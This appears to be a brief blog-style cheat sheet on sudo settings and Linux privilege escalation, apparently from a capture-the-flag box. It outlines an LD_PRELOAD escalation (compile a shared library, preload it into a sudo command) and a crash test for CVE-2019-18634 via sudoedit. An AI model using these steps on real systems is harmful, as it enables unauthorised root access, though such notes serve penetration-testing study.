Configuration options
env_reset: Resets the environment to default configured in /etc/environment.
env_keep: Adds environment variables which are additionally allowed. If LD_PRELOAD is in there, see below.
mail_badpass: Sends an email to the admin if a user failed to provide a sudo password.
secure_path: Sets the PATH environment variable to the given paths.
Configurations
Something like the following from sudo ‑l means that the user www-data may execute commands as user scriptmanager with sudo -u scriptmanager whoami.
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
LD_PRELOAD exploitation
If LD_PRELOAD is allowed for sudo commands, then a library can be (created an) loaded before the command.
- Create a library file like escape_ld_preload.c
- Compile it as library:
gcc -fPIC -shared -nostartfiles -o escape_ld_preload.so escape_ld_preload.c - Append it to a sudo-enabled command:
sudo LD_PRELOAD=/tmp/escape_ld_preload.so passwd
CVE-2019–18634
Vulnerable if this created a memory corruption:
$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): memory corruption
Aborted (core dumped)
Leave a Reply
You must be logged in to post a comment.